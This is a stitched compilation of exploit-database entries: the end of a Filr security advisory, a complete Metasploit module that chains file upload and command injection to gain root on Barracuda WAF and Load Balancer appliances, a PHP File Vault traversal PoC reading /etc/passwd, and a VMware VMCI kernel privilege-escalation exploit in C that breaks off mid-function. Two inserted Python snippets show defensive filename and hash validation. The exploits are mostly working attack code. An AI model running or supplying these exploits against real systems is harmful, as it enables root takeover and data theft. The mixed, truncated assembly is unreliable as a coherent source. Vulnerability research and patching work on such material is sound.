2016-07-12: Asking for status update; "final rounds of QA" at Micro Focus
2016-07-16: Postponing advisory release, patch not yet ready
2016-07-22: Patch release by Micro Focus
2016-07-25: Coordinated advisory release
Solution:
---------
The "Filr 2.0 Security Update 2" can be downloaded here and should
be applied immediately:
https://download.novell.com/Download?buildid=3V-3ArYN85I~
Those patches fix vulnerabilities #1, #2, #4, #6, #7
"Filr 1.2 Security Update 3" can be found here:
https://download.novell.com/Download?buildid=BOTiHcBFfv0~
Knowledge base references at Micro Focus:
Issue #1: https://www.novell.com/support/kb/doc.php?id=7017786
Issue #2: https://www.novell.com/support/kb/doc.php?id=7017789
Issue #4: https://www.novell.com/support/kb/doc.php?id=7017787
Issue #6 & #7: https://www.novell.com/support/kb/doc.php?id=7017788
Local privilege escalation via insecure file permissions (#8) has
already been fixed in the Filr 2.0 security update 1 in June:
https://www.novell.com/support/kb/doc.php?id=7017689
Issue #3: According to Micro Focus, Jetty actually runs as user
"vabase-jetty" but will pass commands off to another service on
the box that runs as root to perform privileged actions.
They have fixed the command injection in this release and the
next release will include much more stringent parameter validation
for passing the commands.
Issue #5: According to Micro Focus, a component of Filr does not
function properly when the httpOnly flag is enabled. This will be
addressed in a future release.
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF W. Ettlinger / @2016
# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)
# Date: 07/25/16
# Exploit Author: xort xort@blacksecurity.org
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall
# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= v8.0.1.007 (2016-01-07)
# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07)
# CVE : None.
# This exploit combines 2 bugs to leverage root access
# Vuln 1: ondefined_view_template trigger - File upload vuln
# Vuln 2: ondefined_remove_corefiles trigger - Command injection vuln (from loaded file data)
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Barracuda Web App Firewall Firmware Version <= 8.0.1.007 and Load Balancer Firmware <= v5.4.0.004
by chaining two vulnerabilities in the web administration interface. The first bug leverages an Arbitrary File
Upload vulnerability to create a malicious file containing shell commands; a second bug, meant to clean
up left-over core files on the device, then executes them. By sending specially crafted requests
it is possible to inject system commands while escalating to root due to relaxed sudo configurations on the appliances.
},
'Author' =>
[
'xort', # vuln + metasploit module
],
'Version' => '$Revision: 2 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Barracuda Web App Firewall Firmware Version <= 8.0.1.007 (2016-01-07)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
}
],
['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd"
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('ET', [ false, 'Login "et" token value (obtained from the login response if empty)', "" ]),
OptString.new('USERNAME', [ true, 'Device username', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password_clear, et)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
enc_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'Accept' => "application/json, text/javascript, */*; q=0.01",
'Content-Type' => "application/x-www-form-urlencoded",
'X-Requested-With' => "XMLHttpRequest"
},
'vars_post' =>
{
'enc_key' => enc_key,
'et' => et,
'user' => "admin", # username,
'password' => "admin", # password_clear,
'enctype' => "none",
'password_entry' => "",
'login_page' => "1",
'login_state' => "out",
'real_user' => "",
'locale' => "en_US",
'form' => "f",
'Submit' => "Sign in",
}
}, timeout)
# get rid of first yank
password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
return password, et
end
def run_command(username, password, et, cmd)
vprint_status( "Running Command...\n" )
# file to overwrite
cmd_file = "/home/product/code/config/corefile_list.txt"
# file to replace
sudo_cmd_exec = target['SudoCmdExec']
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
# random filename to dump to; the file must live under /tmp
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
# decoder stubs - tells 'base64' command to decode and dump data to temp file
b64decode1 = "echo \""
b64decode2 = "\" | base64 -d >" + b64dumpfile
# base64 - encode with base64 so we can send special chars and multiple lines
cmd = Base64.strict_encode64(cmd)
# Create injection string.
# a) package the base64 decoder with encoded bytes
# b) attach a chmod +x request to make the script created (b64dumpfile) executable
# c) execute decoded base64 dumpfile
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile
exploitreq = [
[ "auth_type","Local" ],
[ "et",et ],
[ "locale","en_US" ],
[ "password", password ],
[ "primary_tab", "BASIC" ],
[ "realm","" ],
[ "secondary_tab","reports" ],
[ "user", username ],
[ "timestamp", Time.now.to_i ],
[ "upload_template_file_filename", "admin" ]
]
boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
post_data = ""
exploitreq.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
# upload file
up_filename = cmd_file
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"upload_template_file\"; filename=\"../#{up_filename}\"\r\n\r\n"
post_data << ";#{injection_string};\r\n"
# end data
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"view_template\"\r\n\r\n"
post_data << "\r\n"
post_data << "--#{boundary}--\r\n" # end boundary
# upload file vuln
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5"
}
})
post_data = ""
exploitreq.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
# trigger vuln: the remove_corefiles handler reads the file written above
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"remove_corefiles\"\r\n\r\n"
post_data << "\r\n"
post_data << "--#{boundary}--\r\n" # end boundary
# command injection vuln (executes the uploaded file contents)
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5"
}
})
end
def run_script(username, password, et, cmds)
vprint_status( "running script...\n")
end
def exploit
# timeout
timeout = 1550;
user = "admin"
# params
real_user = "";
login_state = "out"
et = Time.now.to_i
locale = "en_US"
user = "admin"
password = "admin"
enctype = "MD5"
password_entry = ""
password_clear = "admin"
password_hash, et = do_login(user, password_clear, et)
vprint_status("new password: #{password_hash} et: #{et}\n")
sleep(5)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
handler
end
end
end
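The module's description turns on one server-side mistake: a multipart upload whose filename is trusted as a path. The following is an added example, not part of the module or of Barracuda's code, showing the screening a file-upload handler should apply: the body is parsed, any part that carries a filename is checked for path separators, parent-directory segments and absolute paths, and the name is reduced to a sanitized basename before it is ever joined to a storage directory. The boundary, field names and sample body are constructed for this example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample request body: one ordinary field, one file part whose
# filename carries a traversal sequence, one empty field. The boundary and
# field names are illustrative and do not come from any real device.
BOUNDARY = "----ConstructedBoundary0123456789"

SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="locale"\r\n\r\n'
    "en_US\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload_template_file"; '
    'filename="../../../tmp/injected.txt"\r\n\r\n'
    "constructed template contents\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="view_template"\r\n\r\n'
    "\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()


def parse_multipart(body: bytes, boundary: str) -> List[Dict[str, Optional[str]]]:
    """Split a multipart/form-data body into parts with name, filename and data."""
    delim = b"--" + boundary.encode()
    parts: List[Dict[str, Optional[str]]] = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter "--boundary--" reached
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        headers, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):
            data = data[:-2]  # CRLF that precedes the next delimiter
        disp = headers.decode("latin-1")
        # "(?<!file)" keeps the name= match from landing inside filename=
        name = re.search(r'(?<!file)name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        parts.append({
            "name": name.group(1) if name else None,
            "filename": fname.group(1) if fname else None,
            "data": data.decode("latin-1"),
        })
    return parts


def filename_findings(filename: str) -> List[str]:
    """Reasons a client-supplied filename must not be used as a path."""
    reasons = []
    if "/" in filename or "\\" in filename:
        reasons.append("path separator in filename")
    if ".." in re.split(r"[\\/]", filename):
        reasons.append("parent-directory traversal")
    if filename.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", filename):
        reasons.append("absolute path")
    return reasons


def safe_basename(filename: str) -> str:
    """Keep only the last path segment, restricted to a conservative charset."""
    base = re.split(r"[\\/]", filename)[-1]
    base = re.sub(r"[^A-Za-z0-9._-]", "_", base).lstrip(".")
    return base or "upload"


def audit_upload(body: bytes, boundary: str) -> List[Tuple[Optional[str], str, List[str]]]:
    """Return (field name, filename, reasons) for every file part that fails the checks."""
    findings = []
    for part in parse_multipart(body, boundary):
        if part["filename"] is None:
            continue
        reasons = filename_findings(part["filename"])
        if reasons:
            findings.append((part["name"], part["filename"], reasons))
    return findings


if __name__ == "__main__":
    for field, fname, reasons in audit_upload(SAMPLE_BODY, BOUNDARY):
        print(f"{field}: {fname!r} rejected ({'; '.join(reasons)}), "
              f"would store as {safe_basename(fname)!r}")
```

The same check belongs in a reverse proxy or WAF rule in front of a CGI that cannot be patched: a `filename=` parameter containing a slash or a `..` segment has no legitimate use in a form upload.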
PHP File Vault version 0.9, remote directory traversal and read file vulnerability
==================================================================================
Discovered by N_A, N_A[at]tutanota.com
======================================
Description
===========
A very small PHP website application which stores anonymously uploaded files and retrieves them by SHA1 hash (a fingerprint of the file which is provided after uploading). Developed for anonysource.org, a kanux project.
https://sourceforge.net/projects/php-file-vault
Vulnerability
=============
The vulnerability exists within the fileinfo.php file of the package:
    if (empty($_GET['sha1'])) die("sha1 is required to get file info");
    $sha1 = trim($_GET['sha1']);
The 'sha1' variable is taken from the GET request and passed, unvalidated, to the 'parseFileInfo' function. This function incorporates a call to
the fopen() function within PHP:
    function parseFileInfo($fi) {
        $fh = fopen($fi,'r');
        $fname = trim(fgets($fh));
        fclose($fh);
        return array($fname);
    }
The parseFileInfo() function is called within the file fileinfo.php with the 'sha1' variable inside:
    if (!is_readable(FI.$sha1)) die("cannot read file info!");
    list($fname) = parseFileInfo(FI.$sha1);
    readfile('head.html');
    if ($fname) echo "<h1><a href=\"/$sha1\">$fname</a></h1>";
This is the vulnerability that allows parts of *any world readable* file to be read by a remote attacker.
Attacks can include gathering sensitive information, .bash_history, .rhosts, /etc/passwd and so on.
Proof Of Concept
================
PoC exploit = http://127.0.0.1/htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
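The missing control is an input check before FI.$sha1 is formed. As an added example (not part of PHP File Vault), the following mirrors the handler's trim() and then enforces the only shape a SHA-1 lookup key can have, exactly 40 hexadecimal characters, with a second, path-based check so that even a validated value must resolve inside the storage directory. FILE_INFO_DIR is a constructed path standing in for the application's FI constant.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Constructed stand-in for the FI constant (the file-info directory).
FILE_INFO_DIR = "/var/www/filevault/fileinfo"

# A SHA-1 hex digest is exactly 40 hex characters; nothing else is a key.
SHA1_RE = re.compile(r"\A[0-9a-f]{40}\Z")


def normalize_sha1(raw: str) -> Optional[str]:
    """URL-decode (as the web server would), trim like the PHP, then validate.

    Returns the lower-cased digest, or None when the value is not a digest.
    """
    value = unquote(raw).strip().lower()
    return value if SHA1_RE.fullmatch(value) else None


def fileinfo_path(raw_sha1: str, base_dir: str = FILE_INFO_DIR) -> Optional[str]:
    """Safe replacement for FI.$sha1: None means refuse the request."""
    digest = normalize_sha1(raw_sha1)
    if digest is None:
        return None
    candidate = os.path.normpath(os.path.join(base_dir, digest))
    # Defence in depth: the resolved path must still live under base_dir.
    if os.path.commonpath([base_dir, candidate]) != base_dir:
        return None
    return candidate


def parse_file_info(path: str) -> Optional[str]:
    """Equivalent of parseFileInfo(): first line of the metadata file, trimmed."""
    if not os.path.isfile(path):
        return None
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return fh.readline().strip()


if __name__ == "__main__":
    # The traversal value from the PoC above is rejected before any file access.
    print(fileinfo_path("..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"))   # None
    # SHA-1 of the empty string, a well-formed key.
    print(fileinfo_path("da39a3ee5e6b4b0d3255bfef95601890afd80709"))
```

Validating the syntax of the key is what makes is_readable() safe to call: with the allowlist in place the concatenation can only ever name a file directly inside the file-info directory.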
/*
CVE-2013-1406 exploitation PoC
by Artem Shishkin,
Positive Research,
Positive Technologies,
02-2013
*/
void __stdcall FireShell(DWORD dwSomeParam)
{
EscalatePrivileges(hProcessToElevate);
// Equate the stack and quit the cycle
#ifndef _AMD64_
__asm
{
pop ebx
pop edi
push 0xFFFFFFF8
push 0xA010043
}
#endif
}
HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0)
{
HANDLE hResult = 0;
DWORD dwLookupProcessID = dwProcessID;
if (pHandleTable == NULL)
{
printf("Ain't funny\n");
return 0;
}
if (dwLookupProcessID == 0)
{
dwLookupProcessID = GetCurrentProcessId();
}
for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
{
if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr))
{
hResult = pHandleTable->Handles[i].HandleValue;
break;
}
}
return hResult;
}
PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
{
PVOID pResult = 0;
DWORD dwLookupProcessID = dwProcessID;
if (pHandleTable == NULL)
{
printf("Ain't funny\n");
return 0;
}
if (dwLookupProcessID == 0)
{
dwLookupProcessID = GetCurrentProcessId();
}
for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
{
if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
{
pResult = (HANDLE)pHandleTable->Handles[i].Object;
break;
}
}
return pResult;
}
void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
{
DWORD dwLookupProcessID = dwProcessID;
if (pHandleTable == NULL)
{
printf("Ain't funny\n");
return;
}
if (dwLookupProcessID == 0)
{
dwLookupProcessID = GetCurrentProcessId();
}
for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
{
if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
{
pHandleTable->Handles[i].Object = NULL;
pHandleTable->Handles[i].HandleValue = NULL;
break;
}
}
return;
}
void PoolSpray()
{
// Init used native API function
lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL)
{
printf("Such a fail...\n");
return;
}
// Determine object size
// xp:
//const DWORD_PTR dwSemaphoreSize = 0x38;
// 7:
//const DWORD_PTR dwSemaphoreSize = 0x48;
DWORD_PTR dwSemaphoreSize = 0;
if (LOBYTE(GetVersion()) == 5)
{
dwSemaphoreSize = 0x38;
}
else if (LOBYTE(GetVersion()) == 6)
{
dwSemaphoreSize = 0x48;
}
unsigned int cycleCount = 0;
while (cycleCount < 50000)
{
HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL);
if (hTemp == NULL)
{
break;
}
++cycleCount;
}
printf("\t[+] Spawned lots of semaphores\n");
printf("\t[.] Initing pool windows\n");
Sleep(2000);
DWORD dwNeeded = 4096;
NTSTATUS status = 0xFFFFFFFF;
PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE);
while (true)
{
status = NtQuerySystemInformation(SystemExtendedHandleInformation, pBuf, dwNeeded, NULL);
if (status != STATUS_SUCCESS)
{
dwNeeded *= 2;
VirtualFree(pBuf, 0, MEM_RELEASE);
pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE);
}
else
{
break;
}
};
HANDLE hHandlesToClose[0x30] = {0};
DWORD dwCurPID = GetCurrentProcessId();
PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf;
for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++)
{
if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID)
{
DWORD_PTR dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object;
DWORD_PTR dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue;
DWORD_PTR dwWindowAddress = 0;
bool bPoolWindowFound = false;
UINT iObjectsNeeded = 0;
// Needed window size is vmci packet pool chunk size (0x218) divided by
// Semaphore pool chunk size (dwSemaphoreSize)
iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0);
if (
// Not on a page boundary
((dwTestObjAddr & 0xFFF) != 0)
&&
// Doesn't cross page boundary
(((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000))
)
{
// Check previous object for being our semaphore
DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize;
if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL)
{
continue;
}
for (unsigned int j = 1; j < iObjectsNeeded; j++)
{
DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize);
HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr);
//printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal);
//printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr);
//printf("\tLooked up handle = %08X\n", hLookedUp);
if (hLookedUp != NULL)
{
hHandlesToClose[j] = hLookedUp;
if (j == iObjectsNeeded - 1)
{
// Now test the following object
dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize);
if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL)
{
hHandlesToClose[0] = (HANDLE)dwTestHandleVal;
bPoolWindowFound = true;
dwWindowAddress = dwTestObjAddr;
// Close handles to create a memory window
for (int k = 0; k < iObjectsNeeded; k++)
{
if (hHandlesToClose[k] != NULL)
{
CloseHandle(hHandlesToClose[k]);
CloseTableHandle(pHandleTable, hHandlesToClose[k]);
}
}
}
else
{
memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
break;
}
}
}
else
{
memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
break;
}
}
if (bPoolWindowFound)
{
printf("\t[+] Window found at %08X!\n", dwWindowAddress);
}
}
}
}
VirtualFree(pBuf, 0, MEM_RELEASE);
return;
}
void InitFakeBuf(PVOID pBuf, DWORD dwSize)
{
if (pBuf != NULL)
{
RtlFillMemory(pBuf, dwSize, 0x11);
}
return;
}
void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep)
{
/*
Previous chunk size will be always 0x43 and the pool index will be 0, so the last bytes will be 0x0043
So, for every 0xXXXX0043 address we must suffice the following conditions:
lea edx, [eax+38h]
lock xadd [edx], ecx
cmp ecx, 1
Some sort of lock at [addr + 38] must be equal to 1. And
call dword ptr [eax+0ACh]
The call site is located at [addr + 0xAC]
Also fake the object to be dereferenced at [addr + 0x100]
*/
if (pBuf != NULL)
{
for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep)
{
PDWORD pLock = (PDWORD)(iAddr + 0x38);
PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC);
PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100);
*pLock = 1;
*pCallMeMayBe = (DWORD_PTR)FireShell;
*pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000;
}
}
return;
}
void PenetrateVMCI()
{
/*
VMware Security Advisory
Advisory ID: VMSA-2013-0002
Synopsis: VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability
Issue date: 2013-02-07
Updated on: 2013-02-07 (initial advisory)
CVE numbers: CVE-2013-1406
*/
DWORD dwPidToElevate = 0;
HANDLE hSuspThread = NULL;
bool bXP = (LOBYTE(GetVersion()) == 5);
bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1));
bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2));
if (!InitKernelFuncs())
{
printf("[-] Like I don't know where the shellcode functions are\n");
return;
}
if (bXP)
{
printf("[?] Who do we want to elevate?\n");
scanf_s("%d", &dwPidToElevate);
hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate);
if (hProcessToElevate == NULL)
{
printf("[-] This process doesn't want to be elevated\n");
return;
}
}
if (b7 || b8)
{
// We are unable to change an active process token on-the-fly,
// so we create a custom shell suspended (Ionescu hack)
STARTUPINFO si = {0};
PROCESS_INFORMATION pi = {0};
si.wShowWindow = TRUE;
WCHAR cmdPath[MAX_PATH] = {0};
GetSystemDirectory(cmdPath, MAX_PATH);
wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe");
if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi) == TRUE)
{
hProcessToElevate = pi.hProcess;
hSuspThread = pi.hThread;
}
}
HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
if (hVMCIDevice != INVALID_HANDLE_VALUE)
{
UCHAR BadBuff[0x624] = {0};
UCHAR retBuf[0x624] = {0};
DWORD dwRet = 0;
printf("[+] VMCI service found running\n");
PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff;
pVmReq->Header.RequestSize = 0xFFFFFFF0;
PVOID pShellSprayBufStd = NULL;
PVOID pShellSprayBufQtd = NULL;
PVOID pShellSprayBufStd7 = NULL;
PVOID pShellSprayBufQtd7 = NULL;
PVOID pShellSprayBufChk8 = NULL;
if ((b7) || (bXP) || (b8))
{
/*
Significant bits of a PoolType of a chunk define the following regions:
0x0A000000 - 0x0BFFFFFF - Standard chunk
0x1A000000 - 0x1BFFFFFF - Quoted chunk
0x0 - 0xFFFFFFFF - Free chunk - no idea
Addon for Windows 7:
Since PoolType flags have changed, and "In use flag" is now 0x2,
define an additional region for Win7:
0x04000000 - 0x06000000 - Standard chunk
0x14000000 - 0x16000000 - Quoted chunk
*/
pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if ((pShellSprayBufStd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufStd7 == NULL) || (pShellSprayBufQtd7 == NULL))
{
printf("\t[-] Unable to map the needed memory regions, please try running the app again\n");
CloseHandle(hVMCIDevice);
return;
}
InitFakeBuf(pShellSprayBufStd, 0x2000000);
InitFakeBuf(pShellSprayBufQtd, 0x2000000);
InitFakeBuf(pShellSprayBufStd7, 0x2000000);
InitFakeBuf(pShellSprayBufQtd7, 0x2000000);
PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000);
PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000);
PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000);
PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000);
if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE)
{
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
}
PoolSpray();
if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE)
{
printf("\t[!] If you don't see any BSOD, you're successful\n");
if (b7 || b8)
{
ResumeThread(hSuspThread);
}
}
else
{
printf("[-] Not this time %d\n", GetLastError());
}
if (pShellSprayBufStd != NULL)
{
VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE);
}
if (pShellSprayBufQtd != NULL)
{
VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE);
}
}
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);
CloseHandle(hVMCIDevice);
}
else
{
printf("[-] Like I don't see vmware here\n");
}
CloseHandle(hProcessToElevate);
